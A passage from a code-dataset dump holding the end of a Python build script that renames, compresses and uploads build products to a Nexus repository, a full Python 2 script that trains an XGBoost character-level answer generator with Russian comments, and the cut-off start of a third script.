!= 0:\n return None\n else:\n return re.search(\"^(?P<content>(.|\\\\n)*.)?\\\\n*$\", stdout).group(\"content\")\n\n versionTool = os.path.join(path, \"versionTool\", \"versionTool\")\n if application:\n repoVersion = CaptureOutput([versionTool, \"--version\", repo, \"--no-libmarket\"])\n else:\n repoVersion = CaptureOutput([versionTool, \"--version\", repo])\n eclipsePlatform = CaptureOutput([versionTool, \"--eclipse-platform\"])\n buildType = CaptureOutput([versionTool, \"--build-type\"])\n\n if (repoVersion is None) or (eclipsePlatform is None) or (buildType is None):\n return None\n else:\n return (\"%s-%s\" % (eclipsePlatform, buildType.lower()), repoVersion)\n\ndef GetTargets(path, slug):\n def GetPathTargets(path, slug):\n pattern = re.compile(\"^(?P<base>.+)(?P<suffix>-\" + re.escape(slug[0]) + \"(\\\\..+)?)$\")\n # TODO: determine the path in a more generic way\n for line in open(os.path.join(path, \"..\", \"install_manifest.txt\")):\n line = line.rstrip(\"\\n\")\n (head, tail) = os.path.split(line);\n match = pattern.match(tail)\n if (match is not None):\n yield line, os.path.join(head, \"%s-%s%s\" % (match.group(\"base\"), slug[1], match.group(\"suffix\")))\n else:\n yield line, None\n\n try:\n return None if slug is None else tuple(GetPathTargets(path, slug))\n except:\n return None\n\ndef RenameTargets(targets, compress):\n def CompressFile(path):\n # TODO: support non-UNIX\n try:\n sys.stderr.write(\"Compressing %s with bzip2\\n\" % path)\n result = subprocess.call([\"bzip2\", \"-fk\", path])\n return path + \".bz2\" if result == 0 else None\n except:\n return None\n\n def RenameOneGroup(old, new):\n if new is not None:\n try:\n os.rename(old, new)\n except:\n sys.stderr.write(\"Failed to rename %s to %s\\n\" % (old, new))\n return None\n else:\n sys.stdout.write(\"Renamed %s to %s\\n\" % (old, new))\n else:\n new = old\n if compress:\n compressed = CompressFile(new)\n if compressed is None:\n sys.stderr.write(\"Failed to compress %s\\n\" % new)\n return None\n else:\n sys.stdout.write(\"Compressed %s as %s\\n\" % (new, compressed))\n return new\n\n for target in targets:\n yield None if target is None or len(target) != 2 else RenameOneGroup(target[0], target[1])\n\ndef NexusUpload(dir, repo, path, slug, output, application):\n zipName = \"\"\n if not application:\n zipName = \"lib\"\n zipName += \"%s-%s-%s.zip\" % (repo, slug[1], slug[0])\n zipPath = os.path.join(path, zipName)\n try:\n if os.path.lexists(zipPath):\n os.remove(zipPath)\n args = [\"zip\", \"-j9\", zipName]\n args.extend([os.path.relpath(product, os.path.realpath(path)) for product in output])\n sys.stdout.write(\" \".join(args) + \"\\n\")\n status = subprocess.call(args, cwd=path)\n except:\n status = 255\n if status != 0:\n sys.stderr.write(\"Failed to zip products for %s\\n\" % path)\n return False\n try:\n # See http://jira/browse/OP-1967\n artifactId = \"-DartifactId=lib%s\"\n groupId = \"-DgroupId=Library\"\n if application:\n artifactId = \"-DartifactId=%s\"\n groupId = \"-DgroupId=C\"\n args = [\n \"/opt/apache-maven-2.2.1/bin/mvn\", \"-e\", \"deploy:deploy-file\",\n \"-Durl=http://nexus/content/repositories/\" + dir,\n \"-DrepositoryId=nexus\",\n groupId,\n artifactId % repo,\n (\"-Dversion=%s\" % slug[1]) + (\"-SNAPSHOT\" if dir == \"snapshot\" else \"\"),\n \"-Dpackaging=zip\",\n \"-Dclassifier=%s\" % slug[0],\n \"-DuniqueVersion=false\",\n \"-Dfile=%s\" % zipPath]\n sys.stdout.write(\" \".join(args) + \"\\n\")\n environ = os.environ.copy()\n environ['M2_HOME'] = '/opt/apache-maven-2.2.1'\n status = 
subprocess.call(args, env=environ)\n\n except:\n status = 255\n if status != 0:\n sys.stderr.write(\"Failed to upload %s to Eclipse Nexus\\n\" % zipPath)\n return False\n return True\n\nfailed = False\noptions, repo, path = ParseCommandLine()\npath = SanitisePath(path)\nslug = GetSlug(repo, path, options.application)\ntargets = GetTargets(path, slug)\n\noutputs = tuple(RenameTargets(targets, options.compress))\nif None in outputs:\n failed = True\n\nif options.nexus:\n if options.snapshot == options.release:\n sys.stderr.write(\"One and only one of snapshot / release must be specified but not both\")\n failed = True\n elif (path is not None) and (slug is not None) and (None not in outputs):\n dir = (\"snapshot\" if options.snapshot else \"release\")\n if not NexusUpload(dir, repo, path, slug, outputs, options.application):\n sys.stderr.write(\"Eclipse Nexus upload failed for %s\\n\" % path)\n failed = True\n\nif failed:\n sys.exit(2)\n","sub_path":"cpp/cmake_practice/advance/build/tools/renameInstalledProducts.py","file_name":"renameInstalledProducts.py","file_ext":"py","file_size_in_byte":6535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"561016962","text":"# -*- coding: utf-8 -*-\r\n'''\r\nТренировка авторегрессионной модели, которая посимвольно в режиме teacher forcing учится\r\nгенерировать ответ для заданной предпосылки и вопроса.\r\n\r\nВ качестве классификационного движка для выбора символов используется XGBoost.\r\n\r\nЗа один запуск модели выбирается один новый символ, который добавляется к ранее сгенерированной\r\nцепочке символов ответа (см. функцию generate_answer).\r\n'''\r\n\r\nfrom __future__ import division # for python2 compatibility\r\nfrom __future__ import print_function\r\n\r\nimport itertools\r\nimport json\r\nimport os\r\nimport sys\r\nimport argparse\r\nimport codecs\r\nimport gzip\r\nfrom collections import Counter\r\nimport six\r\nimport numpy as np\r\nimport pandas as pd\r\nimport sklearn.metrics\r\nimport tqdm\r\nimport xgboost\r\nfrom scipy.sparse import lil_matrix\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.random_projection import SparseRandomProjection\r\nfrom sklearn.metrics import classification_report\r\nfrom sklearn.metrics import confusion_matrix\r\n\r\nimport rusyllab\r\n\r\nfrom utils.tokenizer import Tokenizer\r\nimport utils.console_helpers\r\nimport utils.logging_helpers\r\n\r\n# основной настроечный метапараметр - длина символьных шинглов для представления\r\n# предпосылки и вопроса (bag of shingles).\r\nSHINGLE_LEN = 3\r\n\r\nNB_PREV_CHARS = 5 # кол-во пред. символов в сгенерированном ответе, учитываемых при выборе следующего символа.\r\n\r\nNB_SAMPLES = 1000000 # кол-во записей в датасете (до разбивки на тренировку и валидацию)\r\n\r\n# Шинглы с частотой меньше указанной не будут давать входные фичи.\r\nMIN_SHINGLE_FREQ = 2\r\n\r\nBEG_LEN = 10 # длина в символах начального фрагмента фраз, который дает отдельные фичи\r\nEND_LEN = 10 # длина в символах конечного фрагмента фраз, который дает отдельные фичи\r\n\r\nNB_TREES = 1000\r\nMAX_DEPTH = 6 #8 # макс. 
глубина для градиентного бустинга\r\n\r\n\r\n# -------------------------------------------------------------------\r\n\r\nBEG_WORD = u'\\b'\r\nEND_WORD = u'\\n'\r\n\r\nBEG_CHAR = u'\\b'\r\nEND_CHAR = u'\\n'\r\n\r\n# -------------------------------------------------------------------\r\n\r\n\r\nclass Sample:\r\n def __init__(self, premises, question, answer):\r\n self.premises = premises[:]\r\n self.question = question\r\n self.answer = answer\r\n\r\n\r\ndef word2pieces(word):\r\n return word # вариант для разбивки на символы\r\n #return rusyllab.split_word(word) # вариант для разбивки на слоги\r\n\r\n\r\ndef ngrams(s, n):\r\n return [u''.join(z) for z in itertools.izip(*[s[i:] for i in range(n)])]\r\n\r\n\r\ndef words2str(words):\r\n \"\"\"\r\n Цепочку слов соединяем в строку, добавляя перед цепочкой и после нее\r\n пробел и специальные символы начала и конца.\r\n :param words:\r\n :return:\r\n \"\"\"\r\n return BEG_WORD + u' ' + u' '.join(words) + u' ' + END_WORD\r\n\r\n\r\ndef undress(s):\r\n return s.replace(BEG_CHAR, u' ').replace(END_CHAR, u' ').strip()\r\n\r\n\r\ndef encode_char(c):\r\n if c == BEG_CHAR:\r\n return u'\\\\b'\r\n elif c == END_CHAR:\r\n return u'\\\\r'\r\n else:\r\n return c\r\n\r\n\r\ndef vectorize_sample_x(X_data, idata, premise_shingles, question_shingles, answer_shingles,\r\n premise_beg_shingles, question_beg_shingles,\r\n premise_end_shingles, question_end_shingles,\r\n premise_sdr, question_sdr,\r\n answer_prev_chars, word_index, char_index,\r\n premise_str, premise_words,\r\n question_str, question_words,\r\n lexicon,\r\n inshingle2id, outshingle2id, outchar2id):\r\n ps = set(premise_shingles)\r\n qs = set(question_shingles)\r\n\r\n common_shingles = ps & qs\r\n notmatched_ps = ps - qs\r\n notmatched_qs = qs - ps\r\n\r\n nb_inshingles = len(inshingle2id)\r\n\r\n icol = 0\r\n\r\n sx = [common_shingles, notmatched_ps, notmatched_qs,\r\n premise_beg_shingles, question_beg_shingles,\r\n premise_end_shingles, question_end_shingles]\r\n\r\n for shingles in sx:\r\n for shingle in shingles:\r\n if shingle in inshingle2id:\r\n X_data[idata, icol + inshingle2id[shingle]] = True\r\n icol += nb_inshingles\r\n\r\n nb_outshingles = len(outshingle2id)\r\n for shingle in answer_shingles:\r\n if shingle in outshingle2id:\r\n X_data[idata, icol + outshingle2id[shingle]] = True\r\n icol += nb_outshingles\r\n\r\n for c in answer_prev_chars:\r\n X_data[idata, icol+outchar2id[c]] = True\r\n icol += NB_PREV_CHARS*len(outchar2id)\r\n\r\n X_data[idata, icol] = word_index\r\n icol += 1\r\n\r\n X_data[idata, icol] = char_index\r\n icol += 1\r\n\r\n # помечаем символы, которые могут быть после последнего символа в сгенерированной\r\n # части ответа с точки зрения строки предпосылки, вопроса и т.д.\r\n prev_char1 = answer_prev_chars[::-1][-1]\r\n\r\n premise_str1 = premise_str.replace(BEG_CHAR + u' ', BEG_CHAR)\r\n for c, char_index in outchar2id.items():\r\n if prev_char1 + c in premise_str1:\r\n X_data[idata, icol+char_index] = True\r\n icol += len(outchar2id)\r\n\r\n question_str1 = question_str.replace(BEG_CHAR + u' ', BEG_CHAR)\r\n for c, char_index in outchar2id.items():\r\n if prev_char1 + c in question_str1:\r\n X_data[idata, icol+char_index] = True\r\n icol += len(outchar2id)\r\n\r\n premise_words_2grams = set()\r\n for premise_word in premise_words:\r\n for wordform in lexicon.get_forms(premise_word):\r\n premise_words_2grams.update(ngrams(u' ' + wordform + u' ', 2))\r\n for c, char_index in outchar2id.items():\r\n if prev_char1 + c in premise_words_2grams:\r\n X_data[idata, 
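# flag: character c can follow prev_char1 in some wordform of the premise words\r\n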
icol+char_index] = True\r\n icol += len(outchar2id)\r\n\r\n question_words_2grams = set()\r\n for question_word in question_words:\r\n for wordform in lexicon.get_forms(question_word):\r\n question_words_2grams.update(ngrams(u' ' + wordform + u' ', 2))\r\n for c, char_index in outchar2id.items():\r\n if prev_char1 + c in question_words_2grams:\r\n X_data[idata, icol+char_index] = True\r\n icol += len(outchar2id)\r\n\r\n\r\n\r\ndef generate_answer(xgb_answer_generator, tokenizer,\r\n outshingle2id, inshingle2id, outchar2id,\r\n shingle_len, nb_prev_chars, nb_features, id2outchar, phrase2sdr,\r\n premise, question):\r\n premise_words = tokenizer.tokenize(premise)\r\n question_words = tokenizer.tokenize(question)\r\n\r\n premise_wx = words2str(premise_words)\r\n question_wx = words2str(question_words)\r\n\r\n premise_shingles = ngrams(premise_wx, shingle_len)\r\n question_shingles = ngrams(question_wx, shingle_len)\r\n\r\n premise_beg_shingles = ngrams(premise_wx[:BEG_LEN], SHINGLE_LEN)\r\n question_beg_shingles = ngrams(question_wx[:BEG_LEN], SHINGLE_LEN)\r\n\r\n premise_end_shingles = ngrams(premise_wx[-END_LEN:], SHINGLE_LEN)\r\n question_end_shingles = ngrams(question_wx[-END_LEN:], SHINGLE_LEN)\r\n\r\n if phrase2sdr is not None:\r\n premise_sdr = phrase2sdr[premise_wx]\r\n question_sdr = phrase2sdr[question_wx]\r\n else:\r\n premise_sdr = None\r\n question_sdr = None\r\n\r\n answer_chain = BEG_CHAR\r\n\r\n while True:\r\n # цикл добавления новых сгенерированных символов\r\n answer_len = len(answer_chain)\r\n answer_shingles = ngrams(answer_chain, shingle_len)\r\n answer_prev_chars = answer_chain[max(0, answer_len - nb_prev_chars):answer_len]\r\n answer_prev_chars = answer_prev_chars[::-1]\r\n\r\n left_chars = answer_chain[1:]\r\n\r\n # номер генерируемого слова получаем как число пробелов слева\r\n word_index = left_chars.count(u' ')\r\n\r\n # номер генерируемого символа в генерируемом слове - отсчитываем от последнего пробела\r\n rpos = left_chars.rfind(u' ')\r\n if rpos == -1:\r\n # это первое слово\r\n char_index = len(left_chars)\r\n else:\r\n char_index = len(left_chars) - rpos - 1\r\n\r\n X_data = lil_matrix((1, nb_features), dtype='float')\r\n vectorize_sample_x(X_data, 0, premise_shingles, question_shingles, answer_shingles,\r\n premise_beg_shingles, question_beg_shingles,\r\n premise_end_shingles, question_end_shingles,\r\n premise_sdr, question_sdr,\r\n answer_prev_chars, word_index, char_index,\r\n premise_wx, premise_words,\r\n question_wx, question_words,\r\n lexicon,\r\n inshingle2id, outshingle2id, outchar2id)\r\n\r\n D_data = xgboost.DMatrix(X_data, silent=True)\r\n y = xgb_answer_generator.predict(D_data)\r\n c = id2outchar[y[0]]\r\n answer_chain += c\r\n if c == END_CHAR or answer_len >= 100:\r\n break\r\n\r\n return u'{}'.format(answer_chain[1:-1]).strip()\r\n\r\n\r\nclass Word2Lemmas(object):\r\n def __init__(self):\r\n pass\r\n\r\n def load(self, path):\r\n print('Loading lexicon from {}'.format(path))\r\n self.lemmas = dict()\r\n self.forms = dict()\r\n with gzip.open(path, 'r') as rdr:\r\n for line in rdr:\r\n tx = line.strip().decode('utf8').split('\\t')\r\n if len(tx) == 2:\r\n form = tx[0]\r\n lemma = tx[1]\r\n\r\n if form not in self.forms:\r\n self.forms[form] = [lemma]\r\n else:\r\n self.forms[form].append(lemma)\r\n\r\n if lemma not in self.lemmas:\r\n self.lemmas[lemma] = {form}\r\n else:\r\n self.lemmas[lemma].add(form)\r\n print('Lexicon loaded: {} lemmas, {} wordforms'.format(len(self.lemmas), len(self.forms)))\r\n\r\n def get_forms(self, word):\r\n if 
word in self.forms:\r\n #result = set()\r\n #for lemma in self.forms[word]:\r\n # result.update(self.lemmas[lemma])\r\n #return result\r\n return set(itertools.chain(*(self.lemmas[lemma] for lemma in self.forms[word])))\r\n else:\r\n return [word]\r\n\r\n\r\n# -------------------------------------------------------------------\r\n\r\nparser = argparse.ArgumentParser(description='Answer text generator')\r\nparser.add_argument('--run_mode', type=str, default='train', help='what to do: train | query')\r\nparser.add_argument('--input', type=str, default='../data/pqa_all.dat', help='training dataset path')\r\nparser.add_argument('--tmp', type=str, default='../tmp', help='folder to store results')\r\nparser.add_argument('--data_dir', type=str, default='../data', help='folder containing some evaluation datasets')\r\nparser.add_argument('--word2lemmas', type=str, default='../data/ru_word2lemma.tsv.gz')\r\n\r\n\r\nargs = parser.parse_args()\r\n\r\nrun_mode = args.run_mode\r\ntmp_folder = args.tmp\r\ndata_folder = args.data_dir\r\n\r\n# Этот датасет создается скриптом prepare_qa_dataset.py\r\ninput_path = args.input\r\n\r\n# Отбор и упаковка пар словоформа-лемма выполняется скриптом prepare_word2lemmas.py\r\nword2lemmas_path = args.word2lemmas\r\n\r\ntokenizer = Tokenizer()\r\n\r\nlexicon = Word2Lemmas()\r\nlexicon.load(word2lemmas_path)\r\n#for w in lexicon.get_forms(u'дяди'):\r\n# print(u'{}'.format(w))\r\n\r\nconfig_path = os.path.join(tmp_folder,'xgb_answer_generator.config')\r\n\r\nif run_mode == 'train':\r\n input_shingles = set()\r\n output_shingles = set()\r\n inshingle2freq = Counter()\r\n outshingle2freq = Counter()\r\n\r\n phrases1 = []\r\n\r\n # Загружаем датасет, содержащий сэмплы ПРЕДПОСЫЛКИ-ВОПРОС-ОТВЕТ\r\n print(u'Loading samples from {}'.format(input_path))\r\n samples0 = []\r\n max_nb_premises = 0 # макс. 
число предпосылок в сэмплах\r\n tokenizer = Tokenizer()\r\n tokenizer.load()\r\n\r\n with codecs.open(input_path, 'r', 'utf-8') as rdr:\r\n lines = []\r\n for line in rdr:\r\n line = line.strip()\r\n if len(line) == 0:\r\n if len(lines) > 0:\r\n premises = lines[:-2]\r\n question = lines[-2]\r\n answer = lines[-1]\r\n if len(premises) <= 1:\r\n sample = Sample(premises, question, answer)\r\n samples0.append(sample)\r\n\r\n max_nb_premises = max(max_nb_premises, len(premises))\r\n\r\n for phrase in itertools.chain(premises, [question]):\r\n words = tokenizer.tokenize(phrase)\r\n wx = words2str(words)\r\n phrases1.append(wx)\r\n for s in ngrams(wx, SHINGLE_LEN):\r\n input_shingles.add(s)\r\n inshingle2freq[s] += 1\r\n\r\n for s in ngrams(BEG_CHAR + answer + END_CHAR, SHINGLE_LEN):\r\n output_shingles.add(s)\r\n outshingle2freq[s] += 1\r\n\r\n lines = []\r\n\r\n else:\r\n lines.append(line)\r\n\r\n samples = samples0\r\n\r\n all_chars = set(itertools.chain(*phrases1))\r\n max_phrase_len = max(map(len, phrases1))\r\n\r\n nb_chars = len(all_chars)\r\n print('nb_chars={}'.format(nb_chars))\r\n print('max_phrase_len={}'.format(max_phrase_len))\r\n\r\n char2index = dict((c, i) for (i, c) in enumerate(filter(lambda z: z != u' ', all_chars)))\r\n\r\n # оставляем только шинглы с частотой не менее порога\r\n input_shingles = set(s for s, f in inshingle2freq.iteritems() if f >= MIN_SHINGLE_FREQ)\r\n output_shingles = set(s for s, f in outshingle2freq.iteritems() if f >= MIN_SHINGLE_FREQ)\r\n\r\n nb_inshingles = len(input_shingles)\r\n inshingle2id = dict((s, i) for i, s in enumerate(input_shingles))\r\n print('nb_inshingles={}'.format(nb_inshingles))\r\n\r\n nb_outshingles = len(output_shingles)\r\n outshingle2id = dict((s, i) for i, s in enumerate(output_shingles))\r\n print('nb_outshingles={}'.format(nb_outshingles))\r\n\r\n # --------------------------------------------------------------------------\r\n\r\n premises = []\r\n questions = []\r\n answers = []\r\n\r\n for sample in samples:\r\n premise = sample.premises[0] if len(sample.premises) > 0 else u''\r\n question = sample.question\r\n answer = sample.answer\r\n if answer not in [u'да', u'нет']:\r\n premises.append(premise)\r\n questions.append(question)\r\n answers.append(BEG_CHAR+answer+END_CHAR)\r\n\r\n SEED = 123456\r\n TEST_SHARE = 0.2\r\n premises_train, premises_test,\\\r\n questions_train, questions_test,\\\r\n answers_train, answers_test = train_test_split(premises, questions, answers,\r\n test_size=TEST_SHARE,\r\n random_state=SEED)\r\n\r\n # оставим в разборах те, для которых все символы ответа присутствуют и в тестовом, и в\r\n # тренировочном наборах.\r\n set1 = set()\r\n for a in answers_train:\r\n set1.update(a)\r\n\r\n set2 = set()\r\n for a in answers_test:\r\n set2.update(a)\r\n\r\n missing_chars = (set1 - set2) | (set2 - set1)\r\n print(u'missing_chars={}'.format(u' '.join(missing_chars)))\r\n\r\n if len(missing_chars) > 0:\r\n print('Removing samples with cross-missing chars')\r\n premises_train0 = []\r\n questions_train0 = []\r\n answers_train0 = []\r\n for premise, question, answer in itertools.izip(premises_train, questions_train, answers_train):\r\n if not any(c in missing_chars for c in answer):\r\n premises_train0.append(premise)\r\n questions_train0.append(question)\r\n answers_train0.append(answer)\r\n\r\n premises_test0 = []\r\n questions_test0 = []\r\n answers_test0 = []\r\n for premise, question, answer in itertools.izip(premises_test, questions_test, answers_test):\r\n if not any(c in missing_chars for c in 
answer):\r\n premises_test0.append(premise)\r\n questions_test0.append(question)\r\n answers_test0.append(answer)\r\n\r\n premises_train = premises_train0\r\n questions_train = questions_train0\r\n answers_train = answers_train0\r\n\r\n premises_test = premises_test0\r\n questions_test = questions_test0\r\n answers_test = answers_test0\r\n\r\n nb_train = sum((len(x)+2) for x in answers_train)\r\n nb_test = sum((len(x)+2) for x in answers_test)\r\n\r\n all_outchars = set([BEG_CHAR, END_CHAR])\r\n for answer in itertools.chain(answers_train, answers_test):\r\n all_outchars.update(answer.lower())\r\n\r\n nb_outchars = len(all_outchars)\r\n outchar2id = dict((c, i) for i, c in enumerate(all_outchars))\r\n print('nb_outchars={}'.format(nb_outchars))\r\n\r\n print('nb_train={} nb_test={}'.format(nb_train, nb_test))\r\n\r\n nb_features = nb_inshingles*3 + nb_outshingles + nb_outchars*NB_PREV_CHARS\r\n nb_features += 2 # номер генерируемого слова и номер символа в генерируемом слове\r\n nb_features += nb_inshingles*2 # шинглы в начальных фрагментах предпосылки и вопроса\r\n nb_features += nb_inshingles*2 # шинглы в конечных фрагментах предпосылки и вопроса\r\n nb_features += nb_outchars # какие символы в предпосылке бывают после текущего символа\r\n nb_features += nb_outchars # какие символы бывают в любых формах слов предпосылки\r\n nb_features += nb_outchars # какие символы в вопросе бывают после текущего символа\r\n nb_features += nb_outchars # какие символы бывают в любых формах слов вопроса\r\n\r\n print('nb_features={}'.format(nb_features))\r\n\r\n X_train = lil_matrix((nb_train, nb_features), dtype='float32')\r\n y_train = []\r\n\r\n X_test = lil_matrix((nb_test, nb_features), dtype='float32')\r\n y_test = []\r\n\r\n for train_or_test in range(2):\r\n if train_or_test == 0:\r\n premises = premises_train\r\n questions = questions_train\r\n answers = answers_train\r\n X_data = X_train\r\n y_data = y_train\r\n descr = 'Vectorization of training set'\r\n else:\r\n premises = premises_test\r\n questions = questions_test\r\n answers = answers_test\r\n X_data = X_test\r\n y_data = y_test\r\n descr = 'Vectorization of test data'\r\n\r\n idata = 0\r\n\r\n for index, (premise, question, answer) in tqdm.tqdm(enumerate(itertools.izip(premises, questions, answers)),\r\n total=len(premises),\r\n desc=descr):\r\n premise_words = tokenizer.tokenize(premise)\r\n question_words = tokenizer.tokenize(question)\r\n\r\n premise_str = words2str(premise_words)\r\n question_str = words2str(question_words)\r\n\r\n premise_shingles = ngrams(premise_str, SHINGLE_LEN)\r\n question_shingles = ngrams(words2str(question_words), SHINGLE_LEN)\r\n\r\n premise_beg_shingles = ngrams(words2str(premise_words)[:BEG_LEN], SHINGLE_LEN)\r\n question_beg_shingles = ngrams(words2str(question_words)[:BEG_LEN], SHINGLE_LEN)\r\n\r\n premise_end_shingles = ngrams(words2str(premise_words)[-END_LEN:], SHINGLE_LEN)\r\n question_end_shingles = ngrams(words2str(question_words)[-END_LEN:], SHINGLE_LEN)\r\n\r\n premise_sdr = None\r\n question_sdr = None\r\n\r\n answer2 = answer\r\n for answer_len in range(1, len(answer2)):\r\n answer_chain = answer2[:answer_len] # эта цепочка уже сгенерирована к данному моменту\r\n answer_shingles = ngrams(answer_chain, SHINGLE_LEN)\r\n next_char = answer2[answer_len]\r\n answer_prev_chars = answer2[max(0, answer_len-NB_PREV_CHARS):answer_len]\r\n answer_prev_chars = answer_prev_chars[::-1] # чтобы предпоследний символ был всегда на фиксированном месте в метрице, etc\r\n\r\n left_chars = 
answer2[1:answer_len]\r\n\r\n # номер генерируемого слова получаем как число пробелов слева\r\n word_index = left_chars.count(u' ')\r\n\r\n # номер генерируемого символа в генерируемом слове - отсчитываем от последнего пробела\r\n rpos = left_chars.rfind(u' ')\r\n if rpos == -1:\r\n # это первое слово\r\n char_index = len(left_chars)\r\n else:\r\n char_index = len(left_chars) - rpos - 1\r\n\r\n vectorize_sample_x(X_data, idata,\r\n premise_shingles, question_shingles, answer_shingles,\r\n premise_beg_shingles, question_beg_shingles,\r\n premise_end_shingles, question_end_shingles,\r\n premise_sdr, question_sdr,\r\n answer_prev_chars, word_index, char_index,\r\n premise_str, premise_words,\r\n question_str, question_words,\r\n lexicon,\r\n inshingle2id, outshingle2id, outchar2id)\r\n y_data.append(outchar2id[next_char])\r\n\r\n idata += 1\r\n\r\n if X_train.shape[0] != len(y_train):\r\n X_train = X_train[0:len(y_train), :]\r\n\r\n if X_test.shape[0] != len(y_test):\r\n X_test = X_test[0:len(y_test), :]\r\n\r\n id2outchar = dict([(i, c) for c, i in outchar2id.items()])\r\n\r\n print('uniques(y_train)={}'.format(len(set(y_train))))\r\n print('uniques(y_test)={}'.format(len(set(y_test))))\r\n\r\n for y in set(y_train)-set(y_test):\r\n c = id2outchar[y]\r\n print(u'Missing in y_test: {}'.format(c))\r\n\r\n\r\n D_train = xgboost.DMatrix(X_train, y_train, silent=0)\r\n D_val = xgboost.DMatrix(X_test, y_test, silent=0)\r\n\r\n xgb_params = {\r\n 'booster': 'gbtree',\r\n 'subsample': 1.0,\r\n 'max_depth': MAX_DEPTH,\r\n 'seed': 123456,\r\n 'min_child_weight': 1,\r\n 'eta': 0.35,\r\n 'gamma': 0.01,\r\n 'colsample_bytree': 1.0,\r\n 'colsample_bylevel': 1.0,\r\n 'eval_metric': 'merror',\r\n 'objective': 'multi:softmax',\r\n 'num_class': nb_outchars, # len(set(y_train)),\r\n 'silent': 1,\r\n # 'updater': 'grow_gpu'\r\n }\r\n\r\n print('Train model...')\r\n cl = xgboost.train(xgb_params,\r\n D_train,\r\n evals=[(D_val, 'val')],\r\n num_boost_round=1000, #NB_TREES,\r\n verbose_eval=10,\r\n early_stopping_rounds=10)\r\n\r\n print('Training is finished')\r\n\r\n # сохраним конфиг модели, чтобы ее использовать в чат-боте\r\n model_filename = os.path.join(tmp_folder, 'xgb_answer_generator.model')\r\n model_config = {\r\n 'solver': 'xgb',\r\n 'outshingle2id': outshingle2id,\r\n 'inshingle2id': inshingle2id,\r\n 'outchar2id': outchar2id,\r\n 'model_filename': model_filename,\r\n 'shingle_len': SHINGLE_LEN,\r\n 'NB_PREV_CHARS': NB_PREV_CHARS,\r\n 'BEG_LEN': BEG_LEN,\r\n 'END_LEN': END_LEN,\r\n 'nb_features': nb_features,\r\n 'word2lemmas_path': word2lemmas_path\r\n }\r\n\r\n with open(config_path, 'w') as f:\r\n json.dump(model_config, f)\r\n\r\n cl.save_model(model_filename)\r\n\r\n # Финальные оценки точности.\r\n y_pred = cl.predict(D_val)\r\n acc = sklearn.metrics.accuracy_score(y_true=y_test, y_pred=y_pred)\r\n print('per char accuracy={}'.format(acc))\r\n\r\n # Накопим кол-во ошибок и сэмплов для ответов разной длины.\r\n answerlen2samples = Counter()\r\n answerlen2errors = Counter()\r\n\r\n nb_errors = 0\r\n nb_test = min(1000, nb_test)\r\n for premise, question, answer in tqdm.tqdm(itertools.izip(premises_test[:nb_test],\r\n questions_test[:nb_test],\r\n answers_test[:nb_test]),\r\n total=nb_test,\r\n desc='Calculating instance accuracy'):\r\n answer2 = generate_answer(cl, tokenizer,\r\n outshingle2id, inshingle2id, outchar2id,\r\n SHINGLE_LEN, NB_PREV_CHARS, nb_features, id2outchar, None,\r\n premise, question)\r\n answer_len = len(answer)\r\n answerlen2samples[answer_len] += 1\r\n if undress(answer2) 
!= undress(answer):\r\n nb_errors += 1\r\n answerlen2errors[answer_len] += 1\r\n\r\n print('per instance accuracy={}'.format(float(nb_test-nb_errors)/float(nb_test)))\r\n\r\n report_path = os.path.join(tmp_folder, 'xgb_answer_generator.report.txt')\r\n with codecs.open(report_path, 'w', 'utf-8') as wrt:\r\n wrt.write(u'Accuracy for answers with respect to their lengths:\\n')\r\n for answer_len in sorted(answerlen2samples.keys()):\r\n support = answerlen2samples[answer_len]\r\n nb_err = answerlen2errors[answer_len]\r\n acc = 1.0 - float(nb_err)/float(support)\r\n wrt.write(u'{:3d} {}\\n'.format(answer_len, acc))\r\n\r\n wrt.write('\\n\\n')\r\n wrt.write('Multiclass classification report:\\n')\r\n # Для classification_report нужен список только тех названий классов, которые\r\n # встречаются в y_test, иначе получим неверный отчет и ворнинг в придачу.\r\n class_names = [encode_char(id2outchar[y]) for y in sorted(set(y_test) | set(y_pred))]\r\n wrt.write(classification_report(y_test, y_pred, target_names=class_names))\r\n wrt.write('\\n\\n')\r\n #wrt.write(confusion_matrix(y_test, y_pred, labels=class_names))\r\n\r\n # Accuracy for answers with respect to their lengths:\r\n with open(os.path.join(tmp_folder, 'xgb_answer_generator.accuracy.csv'), 'w') as wrt:\r\n wrt.write('answer_len\\tnb_samples\\taccuracy\\n')\r\n for answer_len in sorted(answerlen2samples.keys()):\r\n support = answerlen2samples[answer_len]\r\n nb_err = answerlen2errors[answer_len]\r\n acc = 1.0 - float(nb_err)/float(support)\r\n wrt.write(u'{}\\t{}\\t{}\\n'.format(answer_len, support, acc))\r\n\r\n\r\n\r\nif run_mode == 'query':\r\n # Ручное тестирование натренированной модели генерации ответа.\r\n # Сначала загружаем результаты тренировки.\r\n with open(config_path, 'r') as f:\r\n cfg = json.load(f)\r\n\r\n outshingle2id = cfg['outshingle2id']\r\n inshingle2id = cfg['inshingle2id']\r\n outchar2id = cfg['outchar2id']\r\n model_filename = cfg['model_filename']\r\n SHINGLE_LEN = cfg['shingle_len']\r\n NB_PREV_CHARS = cfg['NB_PREV_CHARS']\r\n BEG_LEN = cfg['BEG_LEN']\r\n nb_features = cfg['nb_features']\r\n\r\n generator = xgboost.Booster()\r\n generator.load_model(cfg['model_filename'])\r\n\r\n phrase2sdr = None\r\n\r\n id2outchar = dict((i, c) for c, i in outchar2id.items())\r\n\r\n while True:\r\n premise = u''\r\n question = None\r\n\r\n premise = raw_input('Premise:> ').decode(sys.stdout.encoding).strip().lower()\r\n if len(premise) > 0 and premise[-1] == u'?':\r\n question = premise\r\n premise = u''\r\n\r\n if question is None:\r\n question = raw_input('Question:> ').decode(sys.stdout.encoding).strip().lower()\r\n if len(question) == 0:\r\n break\r\n\r\n answer = generate_answer(generator, tokenizer,\r\n outshingle2id, inshingle2id, outchar2id,\r\n SHINGLE_LEN, NB_PREV_CHARS, nb_features, id2outchar, phrase2sdr,\r\n premise, question)\r\n\r\n print(u'Answer: {}'.format(answer))\r\n","sub_path":"PyModels/xgb_answer_generator.py","file_name":"xgb_answer_generator.py","file_ext":"py","file_size_in_byte":30202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"453379283","text":"#!/usr/bin/env python3\nfrom ipaddress import *\nfrom nullroute.system.ifconfig import *\nfrom pprint import pprint\nimport sqlalchemy as δ\nimport sqlalchemy.orm\nimport time\n\n## main\n\nMAX_IPV4_LEN = len(\"255.255.255.255\")\nMAX_IPV6_LEN = 